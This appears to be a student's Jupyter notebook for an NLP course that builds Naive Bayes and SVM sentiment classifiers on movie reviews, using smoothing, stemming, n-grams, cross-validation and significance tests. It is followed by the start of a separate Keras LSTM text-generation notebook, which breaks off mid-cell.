word, p_pos, p_neg):\n if not word in self.bag_of_words.keys():\n self.bag_of_words[word] = {}\n self.bag_of_words[word]['POS'] = 0\n self.bag_of_words[word]['NEG'] = 0\n \n self.bag_of_words[word]['P_POS'] = p_pos\n self.bag_of_words[word]['P_NEG'] = p_neg\n \n #\n # Increments the number of positive words it found by 1\n #\n def count_positive_word(self):\n self.total_positive_words += 1\n \n #\n # Increments the number of negative words it found by 1\n #\n def count_negative_word(self):\n self.total_negative_words += 1\n \n #\n # Returns the number of unique words in the BOW.\n #\n def get_n_unique_words(self):\n return len(self.bag_of_words)\n \n #\n # Returns the words in the bag of words.\n #\n def get_words(self):\n return self.bag_of_words\n \n #\n # Returns the number of occurences of the word with the given sentiment (POS or NEG)\n #\n def count_occurences(self, word, sentiment):\n try:\n return self.bag_of_words[word][sentiment]\n except KeyError:\n return 0\n \n #\n # Returns the computed P_POS or P_NEG for the given word, if it is a new word 0 is returned.\n #\n def get_probability(self, word, sentiment):\n sentiment = \"P_{}\".format(sentiment)\n \n try:\n return self.bag_of_words[word][sentiment]\n except KeyError:\n return 0\n", "_____no_output_____" ] ], [ [ "The following code block contains our BayesClassifier class.", "_____no_output_____" ] ], [ [ "\nclass BayesClassifier:\n \n #\n # use_smoothing: If True uses laplace smoothing with constant k=1\n # use_stemming: If True uses stemming.\n # n_grams: The number of features to use, e.g. 
if 2: both 1-grams and 2-grams are used as features.\n # if 3: both 1-grams, 2-grams and 3-grams are used as features.\n #\n def __init__(self, use_smoothing=False, use_stemming=False, n_grams=1):\n self.use_smoothing = use_smoothing\n self.use_stemming = use_stemming\n self.n_grams = n_grams\n self.stemmer = PorterStemmer()\n \n #\n # Given a list of train indices and a list of test indices trains the classifier\n # and returns the accuracy (number) and the results (list of + and -).\n # For question 3.2 we want to be able to indicate if we want only the POS, NEG or BOTH of a CV index.\n # This is the list train_indices_sentiment and test_indices_sentiment.\n # train_and_classify([1, 2, 3], [4], [\"BOTH\", \"POS\", \"POS\"], [\"NEG\"])\n # will train on [1-NEG, 1-POS, 2-POS, 3-POS] and test on [4-NEG]\n #\n def train_and_classify(self, train_indices, test_indices, train_indices_sentiment=[], test_indices_sentiment=[]):\n bag_of_words = self.train(train_indices, train_indices_sentiment)\n \n total = 0\n correct = 0\n results = []\n \n for review in self.get_relevant_reviews(test_indices, test_indices_sentiment):\n prediction = self.classify(bag_of_words, review)\n true_label = review['sentiment']\n \n if prediction == true_label:\n correct += 1\n results.append('+')\n else:\n results.append('-')\n \n total += 1\n \n accuracy = correct / total * 100\n return accuracy, results\n \n #\n # Classifies a single review, returns POS or NEG.\n #\n def classify(self, bag_of_words, review):\n score_positive = math.log(bag_of_words.positive_prior)\n score_negative = math.log(1 - bag_of_words.positive_prior)\n \n for word in self.get_words_of_review(review):\n \n p_pos = bag_of_words.get_probability(word, 'POS')\n p_neg = bag_of_words.get_probability(word, 'NEG')\n \n if p_pos > 0:\n score_positive += math.log(p_pos)\n if p_neg > 0:\n score_negative += math.log(p_neg)\n \n # This word was not in the training set so the probability is 0!\n if self.use_smoothing and (p_pos == 0 or p_neg == 0):\n p_pos = 1 / (bag_of_words.total_positive_words + bag_of_words.get_n_unique_words())\n p_neg = 1 / (bag_of_words.total_negative_words + bag_of_words.get_n_unique_words())\n \n score_positive += math.log(p_pos)\n score_negative += math.log(p_neg)\n \n if (score_positive > score_negative):\n return \"POS\"\n else:\n return \"NEG\"\n\n \n #\n # Trains the classifier, creates a BOW with occurences and probabilities.\n #\n def train(self, indices, indices_sentiment):\n bag_of_words = self.create_bag_of_words(indices, indices_sentiment)\n \n for word in bag_of_words.get_words():\n positive_occurences = bag_of_words.count_occurences(word, \"POS\")\n negative_occurences = bag_of_words.count_occurences(word, \"NEG\")\n\n if self.use_smoothing:\n probability_pos = (positive_occurences + 1) / (bag_of_words.total_positive_words + bag_of_words.get_n_unique_words())\n probability_neg = (negative_occurences + 1) / (bag_of_words.total_negative_words + bag_of_words.get_n_unique_words())\n else:\n if bag_of_words.total_positive_words == 0:\n probability_pos = 0\n else:\n probability_pos = positive_occurences / bag_of_words.total_positive_words\n\n if bag_of_words.total_negative_words == 0:\n probability_neg = 0\n else:\n probability_neg = negative_occurences / bag_of_words.total_negative_words\n\n bag_of_words.add_probabilities(word, probability_pos, probability_neg)\n \n return bag_of_words\n \n #\n # Returns a bag of word object created from the given indices.\n #\n def create_bag_of_words(self, indices, indices_sentiment):\n 
bag_of_words = BagOfWords(self.get_positive_prior(indices, indices_sentiment))\n \n relevant_reviews = self.get_relevant_reviews(indices, indices_sentiment)\n\n for review in relevant_reviews:\n for word in self.get_words_of_review(review):\n bag_of_words.add_word(word, review['sentiment'])\n \n return bag_of_words\n \n #\n # Given the train indices, gets the positive prior. (positive reviews / total reviews)\n #\n def get_positive_prior(self, indices, indices_sentiment):\n n_positive = 0\n n_total = 0\n \n for review in reviews:\n if not review['cv'] in indices:\n continue\n \n if len(indices_sentiment) > 0:\n if indices_sentiment[indices.index(review['cv'])] != \"BOTH\":\n if indices_sentiment[indices.index(review['cv'])] != review['sentiment']:\n continue\n \n \n if review['sentiment'] == 'POS':\n n_positive += 1\n \n n_total += 1\n \n return n_positive / n_total\n \n #\n # Returns a list of the relevant reviews.\n # - Only reviews with the given indices\n # - If self.sentiment != \"BOTH\" only returns reviews of the same sentiment.\n #\n def get_relevant_reviews(self, indices, indices_sentiment):\n relevant_reviews = []\n \n for review in reviews:\n if not review['cv'] in indices:\n continue\n \n if len(indices_sentiment) > 0:\n if indices_sentiment[indices.index(review['cv'])] != \"BOTH\":\n if indices_sentiment[indices.index(review['cv'])] != review['sentiment']:\n continue\n \n relevant_reviews.append(review)\n \n return relevant_reviews\n \n \n def get_words_of_review(self, review):\n words = []\n for line in review['content']:\n for word_pair in line:\n word = word_pair[0].lower()\n \n if self.use_stemming:\n word = self.stemmer.stem(word)\n \n words.append(word)\n \n ngrams = []\n for i in range(0, self.n_grams):\n \n for j in range(0, len(words) - i):\n ngram_word = \"\"\n \n for k in range(0, i+1):\n ngram_word += \"{}\\\\\".format(words[j+k])\n ngrams.append(ngram_word)\n \n return ngrams\n", "_____no_output_____" ], [ "bayes = BayesClassifier(False, False, 1) \n\ntrain_indices = list(range(0,900))\ntest_indices = list(range(900, 1000))\n\nsimple_bayes_accuracy, simple_bayes_results = bayes.train_and_classify(train_indices, test_indices)\nprint(\"Simple (no smoothing) bayes accuracy {0:.2f}%\".format(simple_bayes_accuracy))", "Simple (no smoothing) bayes accuracy 49.50%\n" ] ], [ [ "#### (Bonus Questions) Would you consider accuracy to also be a good way to evaluate your classifier in a situation where 90% of your data instances are of positive movie reviews? (1pt)\n\nYou can simulate this scenario by keeping the positive reviews\ndata unchanged, but only using negative reviews cv000–cv089 for\ntraining, and cv900–cv909 for testing. 
Calculate the classification\naccuracy, and explain what changed.", "_____no_output_____" ] ], [ [ "# Question is very vague, but here is what we think the data should look like:\n# TRAIN\n# 0 - 899 : positive reviews\n# 0 - 89 : negative reviews\n#\n# TEST\n# 900 - 999 : positive reviews\n# 900 - 909 : negative reviews\n#\n\nbayes = BayesClassifier(False, False, 1)\n\ntrain_indices = list(range(0,900))\ntrain_sentiment = []\n\n# For review 0 - 89 say that we want BOTH the positive and negative reviews.\n# For review 90 - 899 say that we want only the POS reviews.\nfor i in range(0, len(train_indices)):\n if i < 90:\n train_sentiment.append(\"BOTH\")\n else:\n train_sentiment.append(\"POS\")\n \ntest_indices = list(range(900, 1000))\ntest_sentiment = []\n\n# For review 900 - 909 say that we want BOTH the positive and negative reviews.\n# For review 910 - 999 say that we want only the POS reviews.\nfor i in range(0, len(test_indices)):\n if i < 10:\n test_sentiment.append(\"BOTH\")\n else:\n test_sentiment.append(\"POS\")\n\nsimple_negative_bayes_accuracy, simple_negative_bayes_results = bayes.train_and_classify(train_indices, test_indices, train_sentiment, test_sentiment)\nprint(\"Simple (no smoothing) bayes accuracy trained on 90% positive reviews {0:.2f}%\".format(simple_negative_bayes_accuracy))", "Simple (no smoothing) bayes accuracy trained on 90% positive reviews 9.09%\n" ] ], [ [ "As you can see the classifier behaves badly now with only 9.09% accuracy. It predicts everything as a negative review. This is because it says very little negative reviews in the training data, and thus, each negative term in the training set will count 10 times more as each positive term in the training data. Meaning that a lot of negative words will have a high probability, explaining why everything gets predicted as negative.", "_____no_output_____" ], [ "## Smoothing\n\nThe presence of words in the test dataset that\nhaven’t been seen during training can cause probabilities in the Naive\nBayes classifier to be $0$, thus making that particular test instance\nundecidable. The standard way to mitigate this effect (as well as to\ngive more clout to rare words) is to use smoothing, in which the\nprobability fraction\n$$\\frac{\\text{count}(w_i, c)}{\\sum\\limits_{w\\in V} \\text{count}(w, c)}$$ for a word\n$w_i$ becomes\n$$\\frac{\\text{count}(w_i, c) + \\text{smoothing}(w_i)}{\\sum\\limits_{w\\in V} \\text{count}(w, c) + \\sum\\limits_{w \\in V} \\text{smoothing}(w)}$$\n\n\n\n", "_____no_output_____" ], [ "#### (Q3.2) Implement Laplace feature smoothing (1pt)\n($smoothing(\\cdot) = \\kappa$, constant for all words) in your Naive\nBayes classifier’s code, and report the impact on performance. \nUse $\\kappa = 1$.", "_____no_output_____" ] ], [ [ "bayes = BayesClassifier(True, False, 1) \n\ntrain_indices = list(range(0,900))\ntest_indices = list(range(900, 1000))\n\nsmoothing_bayes_accuracy, smoothing_bayes_results = bayes.train_and_classify(train_indices, test_indices)\nprint(\"Smoothed bayes accuracy {0:.2f}%\".format(smoothing_bayes_accuracy))", "Smoothed bayes accuracy 82.50%\n" ] ], [ [ "#### (Q3.3) Is the difference between non smoothed (Q3.1) and smoothed (Q3.2) statistically significant? 
(0.5pt)", "_____no_output_____" ] ], [ [ "p_value = sign_test(simple_bayes_results, smoothing_bayes_results)\nprint(\"p_value =\", p_value)", "the difference is significant\np_value = 0.000003547178174130642586494974890\n" ] ], [ [ "## Cross-validation\n\nA serious danger in using Machine Learning on small datasets, with many\niterations of slightly different versions of the algorithms, is that we\nend up with Type III errors, also called the “testing hypotheses\nsuggested by the data” errors. This type of error occurs when we make\nrepeated improvements to our classifiers by playing with features and\ntheir processing, but we don’t get a fresh, never-before seen test\ndataset every time. Thus, we risk developing a classifier that’s better\nand better on our data, but worse and worse at generalizing to new,\nnever-before seen data.\n\nA simple method to guard against Type III errors is to use\ncross-validation. In N-fold cross-validation, we divide the data into N\ndistinct chunks / folds. Then, we repeat the experiment N times, each\ntime holding out one of the chunks for testing, training our classifier\non the remaining N - 1 data chunks, and reporting performance on the\nheld-out chunk. We can use different strategies for dividing the data:\n\n- Consecutive splitting:\n - cv000–cv099 = Split 1\n - cv100–cv199 = Split 2\n - etc.\n \n- Round-robin splitting (mod 10):\n - cv000, cv010, cv020, … = Split 1\n - cv001, cv011, cv021, … = Split 2\n - etc.\n\n- Random sampling/splitting\n - Not used here (but you may choose to split this way in a non-educational situation)\n\n#### (Q3.4) Write the code to implement 10-fold cross-validation using round-robin splitting for your Naive Bayes classifier from Q3.2 and compute the 10 accuracies. Report the final performance, which is the average of the performances per fold. If all splits perform equally well, this is a good sign. 
(1pt)\n\n\n\n\n", "_____no_output_____" ] ], [ [ "#\n# Returns test_indices, and train_indices according to the round robin split algorithm.\n#\ndef round_robin_split_indices(n_split):\n test_indices = []\n train_indices = []\n \n for i in range(0, 1000):\n if i % 10 == n_split:\n test_indices.append(i)\n else:\n train_indices.append(i)\n \n return test_indices, train_indices\n\n#\n# Performs the kfold validation.\n#\ndef do_kfold(use_smoothing=False, use_stemming=False, n_grams=1): \n sum_accuracy = 0\n accuracies = []\n total_variance = 0\n \n all_results = []\n \n bayes = BayesClassifier(use_smoothing, use_stemming, n_grams)\n \n for i in range(0, 10):\n print(\"Progress {0:.0f}%\".format(i / 10 * 100))\n \n test_indices, train_indices = round_robin_split_indices(i)\n \n accuracy, result = bayes.train_and_classify(train_indices, test_indices)\n sum_accuracy += accuracy\n \n accuracies.append(accuracy)\n \n for r in result:\n all_results.append(r)\n\n avg_accuracy = sum_accuracy / 10\n \n for i in range(0, 10):\n sqred_error = (accuracies[i] - avg_accuracy)**2\n total_variance += sqred_error\n \n variance_accuracy = total_variance / 10 \n \n \n return avg_accuracy, variance_accuracy, all_results\n \n \n\nsmoothing_avg_accuracy, smoothing_variance, smoothing_results_kfold = do_kfold(True, False, 1)\nprint(\"10-fold validation average accuracy for 10 folds: {0:.2f}%\".format(smoothing_avg_accuracy))", "Progress 0%\nProgress 10%\nProgress 20%\nProgress 30%\nProgress 40%\nProgress 50%\nProgress 60%\nProgress 70%\nProgress 80%\nProgress 90%\n10-fold validation average accuracy for 10 folds: 81.70%\n" ] ], [ [ "#### (Q3.5) Write code to calculate and report variance, in addition to the final performance. (1pt)\n\n**Please report all future results using 10-fold cross-validation now\n(unless told to use the held-out test set).**", "_____no_output_____" ] ], [ [ "print(\"10-fold validation variance: {0:.2f}\".format(smoothing_variance))", "10-fold validation variance: 6.51\n" ] ], [ [ "## Features, overfitting, and the curse of dimensionality\n\nIn the Bag-of-Words model, ideally we would like each distinct word in\nthe text to be mapped to its own dimension in the output vector\nrepresentation. However, real world text is messy, and we need to decide\non what we consider to be a word. For example, is “`word`\" different\nfrom “`Word`\", from “`word`”, or from “`words`\"? Too strict a\ndefinition, and the number of features explodes, while our algorithm\nfails to learn anything generalisable. Too lax, and we risk destroying\nour learning signal. In the following section, you will learn about\nconfronting the feature sparsity and the overfitting problems as they\noccur in NLP classification tasks.", "_____no_output_____" ], [ "#### (Q3.6): A touch of linguistics (1pt)\n\nTaking a step further, you can use stemming to\nhash different inflections of a word to the same feature in the BoW\nvector space. How does the performance of your classifier change when\nyou use stemming on your training and test datasets? 
Please use the [Porter stemming\n algorithm](http://www.nltk.org/howto/stem.html) from NLTK.\n Also, you should do cross validation and concatenate the predictions from all folds to compute the significance.", "_____no_output_____" ] ], [ [ "stemming_avg_accuracy, stemming_variance, stemming_results_kfold = do_kfold(True, True, 1)\nprint(\"10-fold stemming average accuracy {0:.2f}%\".format(stemming_avg_accuracy))", "Progress 0%\nProgress 10%\nProgress 20%\nProgress 30%\nProgress 40%\nProgress 50%\nProgress 60%\nProgress 70%\nProgress 80%\nProgress 90%\n10-fold stemming average accuracy 81.45%\n" ] ], [ [ "#### (Q3.7): Is the difference between NB with smoothing and NB with smoothing+stemming significant? (0.5pt)\n", "_____no_output_____" ] ], [ [ "p_value = sign_test(stemming_results_kfold, smoothing_results_kfold)\nprint(\"p_value =\", p_value)", "/usr/local/Cellar/ipython/7.1.1/libexec/vendor/lib/python3.7/site-packages/ipykernel_launcher.py:27: DeprecationWarning: `comb` is deprecated!\nImporting `comb` from scipy.misc is deprecated in scipy 1.0.0. Use `scipy.special.comb` instead.\n" ] ], [ [ "#### Q3.8: What happens to the number of features (i.e., the size of the vocabulary) when using stemming as opposed to (Q3.2)? (0.5pt)\nGive actual numbers. You can use the held-out training set to determine these.", "_____no_output_____" ] ], [ [ "bayes = BayesClassifier(False, False, 1)\nbayes_stemming = BayesClassifier(False, True, 1)\n\ntrain_indices = list(range(0, 900))\n\nbow = bayes.train(train_indices, [])\nbow_stemming = bayes_stemming.train(train_indices, [])\n\nprint(\"Number of words without stemming: {}\".format(bow.get_n_unique_words()))\nprint(\"Number of words with stemming: {}\".format(bow_stemming.get_n_unique_words()))", "Number of words without stemming: 45348\nNumber of words with stemming: 32404\n" ] ], [ [ "#### Q3.9: Putting some word order back in (0.5+0.5pt=1pt)\n\nA simple way of retaining some of the word\norder information when using bag-of-words representations is to add **n-grams** features. 
\nRetrain your classifier from (Q3.4) using **unigrams+bigrams** and\n**unigrams+bigrams+trigrams** as features, and report accuracy and statistical significances (in comparison to the experiment at (Q3.4) for all 10 folds, and between the new systems).\n\n\n\n", "_____no_output_____" ] ], [ [ "bigram_avg_accuracy, bigram_variance, bigram_results_kfold = do_kfold(True, False, 2)\ntrigram_avg_accuracy, trigram_variance, trigram_results_kfold = do_kfold(True, False, 3)\n\nprint(\"Unigram average accuracy {0:.2f}%\".format(smoothing_avg_accuracy))\nprint(\"Bigram average accuracy {0:.2f}%\".format(bigram_avg_accuracy))\nprint(\"Trigram average accuracy {0:.2f}%\".format(trigram_avg_accuracy))", "Progress 0%\nProgress 10%\nProgress 20%\nProgress 30%\nProgress 40%\nProgress 50%\nProgress 60%\nProgress 70%\nProgress 80%\nProgress 90%\nProgress 0%\nProgress 10%\nProgress 20%\nProgress 30%\nProgress 40%\nProgress 50%\nProgress 60%\nProgress 70%\nProgress 80%\nProgress 90%\nUnigram average accuracy 81.70%\nBigram average accuracy 84.30%\nTrigram average accuracy 85.15%\n" ], [ "print(\"Improvement from unigrams to unigrams+bigrams\")\np_value = sign_test(bigram_results_kfold, smoothing_results_kfold)\nprint(\"p_value =\", p_value)\n\n\nprint(\"\\n\\nImprovement from unigrams+bigrams to unigrams+bigrams+trigrams\")\np_value = sign_test(bigram_results_kfold, trigram_results_kfold)\nprint(\"p_value =\", p_value)", "Improvement from unigrams to unigrams+bigrams\n" ] ], [ [ "\n#### Q3.10: How many features does the BoW model have to take into account now? (0.5pt)\nHow does this number compare (e.g., linear, square, cubed, exponential) to the number of features at (Q3.8)? \n\nUse the held-out training set once again for this.\n", "_____no_output_____" ] ], [ [ "bayes_bigrams = BayesClassifier(False, False, 2)\nbayes_trigrams = BayesClassifier(False, False, 3)\nbayes_fourgrams = BayesClassifier(False, False, 4)\n\ntrain_indices = list(range(0, 900))\n\nbow_bigrams = bayes_bigrams.train(train_indices, [])\nbow_trigrams = bayes_trigrams.train(train_indices, [])\n\nprint(\"Number of features with unigrams: {}\".format(bow.get_n_unique_words()))\nprint(\"Number of features with bigrams: {}\".format(bow_bigrams.get_n_unique_words()))\nprint(\"Number of features with trigrams: {}\".format(bow_trigrams.get_n_unique_words()))", "Number of features with unigrams: 45348\nNumber of features with bigrams: 471032\nNumber of features with trigrams: 1416686\n" ] ], [ [ "As you can see the number of features goes from ~50,000 to ~500,000 to ~1,500,000 this shows that the increase in features is exponential", "_____no_output_____" ], [ "# Support Vector Machines (4pts)\n", "_____no_output_____" ], [ "Though simple to understand, implement, and debug, one\nmajor problem with the Naive Bayes classifier is that its performance\ndeteriorates (becomes skewed) when it is being used with features which\nare not independent (i.e., are correlated). 
Another popular classifier\nthat doesn’t scale as well to big data, and is not as simple to debug as\nNaive Bayes, but that doesn’t assume feature independence is the Support\nVector Machine (SVM) classifier.\n\nYou can find more details about SVMs in Chapter 7 of Bishop: Pattern Recognition and Machine Learning.\nOther sources for learning SVM:\n* http://web.mit.edu/zoya/www/SVM.pdf\n* http://www.cs.columbia.edu/~kathy/cs4701/documents/jason_svm_tutorial.pdf\n* https://pythonprogramming.net/support-vector-machine-intro-machine-learning-tutorial/\n\n\n\n\n\n\n\nUse the scikit-learn implementation of \n[SVM.](http://scikit-learn.org/stable/modules/svm.html) with the default parameters.\n\n", "_____no_output_____" ], [ "#### (Q4.1): Train SVM and compare to Naive Bayes (2pt)\n\nTrain an SVM classifier (sklearn.svm.LinearSVC) using your features. Compare the\nclassification performance of the SVM classifier to that of the Naive\nBayes classifier from (Q3.4) and report the numbers.\nDo cross validation and concatenate the predictions from all folds to compute the significance. Are the results significantly better?\n\n", "_____no_output_____" ] ], [ [ "from sklearn import preprocessing, model_selection, neighbors, svm\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.svm import LinearSVC as SVC\nfrom nltk.tokenize import TreebankWordTokenizer\n\n#\n## Returns test_indices, and train_indices according to the round robin split algorithm.\n## adjusted to before, as features object has 2000 rows and not just 1000\n#\ndef round_robin_split_indices_features(n_split):\n test_indices = []\n train_indices = []\n test_indices_features = []\n for i in range(0, 1000):\n if i % 10 == n_split:\n test_indices.append(i)\n else:\n train_indices.append(i)\n \n test_indices_features = test_indices + [x + 1000 for x in test_indices]\n train_indices_features = train_indices + [x + 1000 for x in train_indices]\n \n return train_indices_features, train_indices, test_indices_features, test_indices\n\n# example: split 5 is testsplit at the moment\n#train_features, train_ind, test_features, test_ind = round_robin_split_indices(5)\n\n#\n## vectorizes original text documents \n#\ndef get_vectorized_corpus(reviews, indices, tags, without_closed):\n corpus = []\n\n for review in reviews: \n if (review['cv'] not in indices):\n continue\n words = []\n word_tag = []\n\n for line in review['content']:\n for word_pair in line:\n word = word_pair[0].lower() \n \n if(tags != False):\n tag = word_pair[1]\n\n if(without_closed != False):\n \n if(tag.startswith(('V', 'N', 'RB', 'J'))):\n word_tag = word + \"_\" + tag\n \n else:\n continue\n else:\n word_tag = word + \"_\" + tag \n \n else:\n word_tag = word\n words.append(word_tag)\n corpus.append(' '.join(map(str, words)))\n\n count_vect = CountVectorizer(tokenizer = TreebankWordTokenizer().tokenize)\n vectorized_features = count_vect.fit_transform(corpus).toarray()\n \n return vectorized_features\n\n#\n## get original sentiment labels\n#\ndef get_labels(reviews, indices):\n labels = []\n for review in reviews: \n if (review['cv'] not in indices):\n continue\n else: \n labels.append(review[\"sentiment\"])\n return labels\n\n#\n## for obtained indices, one svm is fitted and evaluated according to training and test documents\n#\ndef train_and_classify_one_svm(features, train_indices_features, train_indices, test_indices_features, test_indices):\n\n # training indices \n train_features = features[train_indices_features]\n train_labels = get_labels(reviews, 
train_indices)\n\n # test indices \n test_features = features[test_indices_features]\n test_labels = get_labels(reviews, test_indices)\n\n # linear SVM on training feature vector and labels \n classifier = SVC()\n classifier.fit(train_features, train_labels)\n\n # label prediction for test_feature vector\n label_prediction = classifier.predict(test_features)\n \n # tracking results\n total = 0\n correct = 0\n results = []\n\n for i in range(0, len(test_labels)):\n\n if label_prediction[i] == test_labels[i]:\n correct += 1\n results.append('+')\n else:\n results.append('-')\n total += 1\n\n\n accuracy = correct / total * 100\n \n return accuracy, results\n\n#\n## similar to NB, kfold for SVM (only difference are slightly different indices (due to structure of feature object))\n#\ndef do_kfold_svm(tags=False, without_closed=False): \n\n # create features depending on type of tags [notags, alltags, withoutclosedform]\n \n features = get_vectorized_corpus(reviews, list(range(0,1000)), tags, without_closed)\n\n sum_accuracy = 0\n accuracies = []\n total_variance = 0\n \n all_results = []\n \n for i in range(0, 10):\n print(\"Progress {0:.0f}%\".format(i / 10 * 100))\n \n train_features, train_ind, test_features, test_ind = round_robin_split_indices_features(i)\n \n accuracy, results = train_and_classify_one_svm(features, train_features, train_ind, test_features, test_ind)\n sum_accuracy += accuracy\n \n accuracies.append(accuracy)\n \n for r in results:\n all_results.append(r)\n\n avg_accuracy = sum_accuracy / 10\n \n for i in range(0, 10):\n sqred_error = (accuracies[i] - avg_accuracy)**2\n total_variance += sqred_error\n \n variance_accuracy = total_variance / 10 \n \n return avg_accuracy, variance_accuracy, all_results\n \n\n# calculate svm kfold \nsvm_avg_accuracy, svm_variance, svm_results_kfold = do_kfold_svm()\n\nprint(\"10-fold average accuracy {0:.2f}%\".format(svm_avg_accuracy))\nprint(\"10-fold accuracy variance {0:.2f}%\".format(svm_variance))\n\n# significant difference to Q3.4?\np_value = sign_test(smoothing_results_kfold, svm_results_kfold)\nprint(\"p_value =\", p_value)", "Progress 0%\nProgress 10%\n" ] ], [ [ "### More linguistics\n\nNow add in part-of-speech features. You will find the\nmovie review dataset has already been POS-tagged for you. Try to\nreplicate what Pang et al. were doing:\n\n", "_____no_output_____" ], [ "#### (Q4.2) Replace your features with word+POS features, and report performance with the SVM. Does this help? Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significant? Why? (1pt)\n", "_____no_output_____" ] ], [ [ "# What canges, when pos tags are taken into consideration as well? \nsvm_avg_accuracy_with_tags, svm_variance_with_tags, svm_results_kfold_with_tags = do_kfold_svm(tags=True)\n\nprint(\"10-fold average accuracy {0:.2f}%\".format(svm_avg_accuracy_with_tags))\nprint(\"10-fold accuracy variance {0:.2f}%\".format(svm_variance_with_tags))\n\n# significant difference to Q3.4?\np_value = sign_test(svm_results_kfold, svm_results_kfold_with_tags)\nprint(\"p_value =\", p_value)", "Progress 0%\n" ] ], [ [ "#### (Q4.3) Discard all closed-class words from your data (keep only nouns (N*), verbs (V*), adjectives (J*) and adverbs (RB*)), and report performance. Does this help? Do cross validation and concatenate the predictions from all folds to compute the significance. Are the results significantly better than when we don't discard the closed-class words? Why? 
(1pt)", "_____no_output_____" ] ], [ [ "svm_avg_accuracy_without_closed, svm_variance_without_closed, svm_results_kfold_without_closed = do_kfold_svm(tags=True, without_closed=True)\n\nprint(\"10-fold average accuracy {0:.2f}%\".format(svm_avg_accuracy_without_closed))\nprint(\"10-fold accuracy variance {0:.2f}%\".format(svm_variance_without_closed))\n\n# significant difference to all POS tags allowed?\np_value = sign_test(svm_results_kfold_with_tags, svm_results_kfold_without_closed)\nprint(\"p_value =\", p_value)\n", "Progress 0%\nProgress 10%\n" ] ], [ [ "# (Q5) Discussion (max. 500 words). (5pts)\n\n> Based on your experiments, what are the effective features and techniques in sentiment analysis? What information do different features encode?\nWhy is this important? What are the limitations of these features and techniques?\n \n", "_____no_output_____" ], [ "*Write your answer here in max. 500 words.*\nDiscussion:\neffective features:\n\n- Smoothing, thus not excluding words, that are not seen in the training data, but give them a non zero probability, leads to significantly better accuracy, than Naive Bayes without smoothing. \n\n- Stemming:", "_____no_output_____" ], [ "# Submission \n", "_____no_output_____" ] ], [ [ "# Write your names and student numbers here:\n# Dirk Hoekstra #12283878\n# Philipp Lintl #12152498", "_____no_output_____" ] ], [ [ "**That's it!**\n\n- Check if you answered all questions fully and correctly. \n- Download your completed notebook using `File -> Download .ipynb` \n- Also save your notebook as a Github Gist. Get it by choosing `File -> Save as Github Gist`. Make sure that the gist has a secret link (not public).\n- Check if your answers are all included in the file you submit (e.g. check the Github Gist URL)\n- Submit your .ipynb file and link to the Github Gist via *Canvas*. One submission per group. ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ] ]
cb1c7dcc286314efd43ab9402bec4bad634d46dc
24,216
ipynb
Jupyter Notebook
keras/170519-lstm-text-generation.ipynb
aidiary/notebooks
1bb9338441e12ee52e287ea40179a5f271a5a2be
[ "MIT" ]
3
2018-02-03T09:33:51.000Z
2020-11-23T08:46:43.000Z
keras/170519-lstm-text-generation.ipynb
aidiary/notebooks
1bb9338441e12ee52e287ea40179a5f271a5a2be
[ "MIT" ]
null
null
null
keras/170519-lstm-text-generation.ipynb
aidiary/notebooks
1bb9338441e12ee52e287ea40179a5f271a5a2be
[ "MIT" ]
null
null
null
40.225914
451
0.663239
[ [ [ "from keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers import LSTM\nfrom keras.optimizers import RMSprop\nfrom keras.utils.data_utils import get_file\nimport numpy as np\nimport random\nimport sys", "_____no_output_____" ], [ "path = get_file('nietzsche.txt', origin='https://s3.amazonaws.com/text-datasets/nietzsche.txt')\ntext = open(path).read().lower()\nprint('corpus length:', len(text))", "corpus length: 600893\n" ], [ "chars = sorted(list(set(text)))", "_____no_output_____" ], [ "print('total chars:', len(chars))", "total chars: 57\n" ], [ "char_indices = dict((c, i) for i, c in enumerate(chars))\nindices_char = dict((i, c) for i, c in enumerate(chars))", "_____no_output_____" ], [ "maxlen = 40 # この長さのテキストに分割する\nstep = 3 # オーバーラップ\nsentences = []\nnext_chars = []\nfor i in range(0, len(text) - maxlen, step):\n sentences.append(text[i: i + maxlen]) # 入力となる長さ40の文字列\n next_chars.append(text[i + maxlen]) # 予測したい次の文字\nprint('num sequences:', len(sentences))", "num sequences: 200285\n" ], [ "len(sentences[0]), sentences[0]", "_____no_output_____" ], [ "next_chars[0]", "_____no_output_____" ], [ "print('Vectorization...')\n# 入力は長さ maxlen の文字列なのでmaxlenが必要\nX = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)\n# 出力は1文字しかないので maxlen は不要\ny = np.zeros((len(sentences), len(chars)), dtype=np.bool)\nfor i, sentence in enumerate(sentences):\n for t, char in enumerate(sentence):\n X[i, t, char_indices[char]] = 1 # 対象文字のみTrueとなるベクトルにする\n y[i, char_indices[next_chars[i]]] = 1", "Vectorization...\n" ], [ "print(X.shape, y.shape)", "(200285, 40, 57) (200285, 57)\n" ], [ "print(X[0][0])", "[False False False False False False False False False False False False\n False False False False False False False False False False False False\n False False False False False False False False False False False False\n False False False False False False True False False False False False\n False False False False False False False False False]\n" ], [ "print(y[0])", "[False False False False False False False False False False False False\n False False False False False False False False False False False False\n False False False False False False False False False False False False\n False False False False True False False False False False False False\n False False False False False False False False False]\n" ], [ "print('Build model...')\nmodel = Sequential()\n\n# 